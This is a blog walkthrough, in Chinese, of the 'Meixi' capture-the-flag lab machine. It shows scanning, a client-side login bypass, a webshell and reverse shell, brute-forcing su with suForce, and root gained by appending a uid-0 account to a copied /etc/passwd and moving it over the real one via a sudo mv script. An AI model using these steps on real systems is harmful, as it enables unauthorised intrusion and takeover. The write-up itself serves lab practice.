Pepster'Blog
MazeSec-Meixi-Walkthrough
城南花已开 Lv6
  2025-05-27 10:38:51   2025-06-15 17:23:33    1.6k 字  8 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.199  08:00:27:6c:4b:b3       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:ef:12:9a       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.071 seconds (123.61 hosts/sec). 4 responded
export ip=192.168.60.199
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.199:22
Open 192.168.60.199:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 10:39 CST
Initiating ARP Ping Scan at 10:39
Scanning 192.168.60.199 [1 port]
Completed ARP Ping Scan at 10:39, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:39
Completed Parallel DNS resolution of 1 host. at 10:39, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:39
Scanning 192.168.60.199 [2 ports]
Discovered open port 80/tcp on 192.168.60.199
Discovered open port 22/tcp on 192.168.60.199
Completed SYN Stealth Scan at 10:39, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.199
Host is up, received arp-response (0.00052s latency).
Scanned at 2025-05-27 10:39:28 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:6C:4B:B3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

目录枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.199
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 1556]
/index.html           (Status: 200) [Size: 4585]
/pass                 (Status: 200) [Size: 39]
/5000.txt             (Status: 200) [Size: 39685]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

发现有个登录表单

image

测试后发现,就是纯前端校验的

无论输入什么用户名密码,将disable删掉,都可以进行登录

登陆后有个Activate Webshell

但是会显示没有权限,大概就是迷惑你的😅

还有个/pass目录,curl一下

1
2
❯ curl http://192.168.60.199/pass
NR==1000||NR==2000||NR==3000||NR==4000

是个awk条件判断表达式,当行号等于1000或者2000或者3000或者4000,条件即为真

1
2
3
4
5
6
❯ curl http://192.168.60.199/5000.txt -o 5000.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 39685  100 39685    0     0  13.0M      0 --:--:-- --:--:-- --:--:-- 18.9M
wc -l 5000.txt
5000 5000.txt

根据提示来查看pass

1
2
3
4
5
❯ awk 'NR==1000 || NR==2000 || NR==3000 || NR==4000 {print $0}' 5000.txt
cassandra
fuckit
pinkgirl
summertime

那用户名是什么,不会需要爆破吧

结果试了一下用root作为用户名登录,即可激活webshell😅

用户提权

监听端口,反弹shell过来

发现存在好多用户laoye sublarge qiaojojo hyh

并且qiaojojo还有个备注catch me抓住我

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Meixi-192.168.60.199-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Meixi~192.168.60.199_Linux_x86_64/2025_05_27-19_10_26-033.log 📜
────────────────────────────────────────────────────────────────────────────────────
www-data@Meixi:/var/www/html$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
laoye:x:1000:1000:,,,:/home/laoye:/bin/bash
sublarge:x:1001:1001::/home/sublarge:/bin/bash
qiaojojo:x:1002:1002:catch me:/home/qiaojojo:/bin/bash
hyh:x:1003:1003:,,,:/home/hyh:/bin/bash

尝试利用上面拿到的密码,分别尝试下

得到凭证qiaojojo:pinkgirl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
www-data@Meixi:/tmp$ ./suForce -u qiaojojo -w pass.txt
            _____
 ___ _   _ |  ___|__  _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| ||  _| (_) | | | (_|  __/
|___/\__,_||_|  \___/|_|  \___\___|
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | qiaojojo
📖 Wordlist | pass.txt
🔎 Status   | 3/4/75%/pinkgirl
💥 Password | pinkgirl
───────────────────────────────────

www-data@Meixi:/tmp$ su qiaojojo
Password:
qiaojojo@Meixi:/tmp$

用户存在sudo权限

可以执行/opt/move.sh

看下脚本内容,发现就是利用mv移动文件的功能

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
qiaojojo@Meixi:~$ cat user.txt
flag{user-0af862be-3a27-11f0-9396-000c2955ba04}
qiaojojo@Meixi:~$ sudo -l
Matching Defaults entries for qiaojojo on Meixi:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qiaojojo may run the following commands on Meixi:
    (ALL) NOPASSWD: /opt/move.sh
qiaojojo@Meixi:~$ cd /opt/
qiaojojo@Meixi:/opt$ ls -al
total 12
drwxr-xr-x  2 root root 4096 May 26 07:54 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
-rwxr-xr-x  1 root root  402 May 26 07:54 move.sh
qiaojojo@Meixi:/opt$ cat move.sh
#!/bin/bash

if [ $# -ne 2 ]; then
    echo "Error: Incorrect number of arguments" >&2
    exit 1
fi

src_file=$1
dest_path=$2

if [ ! -f "$src_file" ]; then
    echo "Error: Source file does not exist" >&2
    exit 2
fi

mv "$src_file" "$dest_path"

if [ $? -eq 0 ]; then
    echo "File moved successfully: $src_file -> $dest_path"
else
    echo "Unknown error: Failed to move file" >&2
    exit 4
fi

哎,之前laoda靶机初版原题

Temp-Laoda-Walkthrough | Pepster’Blog

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
qiaojojo@Meixi:/opt$ cd /tmp/
qiaojojo@Meixi:/tmp$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/qiaojojo/.ssh/id_rsa): /tmp/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /tmp/id_rsa
Your public key has been saved in /tmp/id_rsa.pub
The key fingerprint is:
SHA256:9jEUfDXm7RjeVuECUc2zXeSkFQ1CpW6haXFitWm5JWo qiaojojo@Meixi
The key's randomart image is:
+---[RSA 3072]----+
|         ..+*+O=*|
|          .ooO.@+|
|          =.X.=.O|
|         o X *.*o|
|        S E + o +|
|       . + +   . |
|          .      |
|                 |
|                 |
+----[SHA256]-----+

奇怪了,为什么这次就不能复现成功,mv 应该走“复制+删除”路径

但这次mv在移动的时候会保留原始文件的所有者和组信息,可能是这次以root身份执行的通常拥有最高权限,所以 mv 会首先尝试最高效、原子性的操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
qiaojojo@Meixi:/tmp$ cp /etc/passwd .
qiaojojo@Meixi:/tmp$ echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>passwd
qiaojojo@Meixi:/tmp$ sudo /opt/move.sh passwd /etc/passwd
File moved successfully: passwd -> /etc/passwd
qiaojojo@Meixi:/tmp$ ls -al /etc/passwd
-rw-r--r-- 1 qiaojojo qiaojojo 1575 May 27 07:45 /etc/passwd
qiaojojo@Meixi:/tmp$ su primary
Password:
root@Meixi:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Meixi:/tmp# cat /root/root.txt
flag{root-137dd239-3a2a-11f0-a3e5-000c2955ba04}
root@Meixi:/tmp# cat /home/qiaojojo/user.txt
flag{user-0af862be-3a27-11f0-9396-000c2955ba04}
  1. 信息收集
    1. 服务探测
  2. 用户提权
总字数 633.1k
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
  1. 信息收集
    1. 服务探测
  2. 用户提权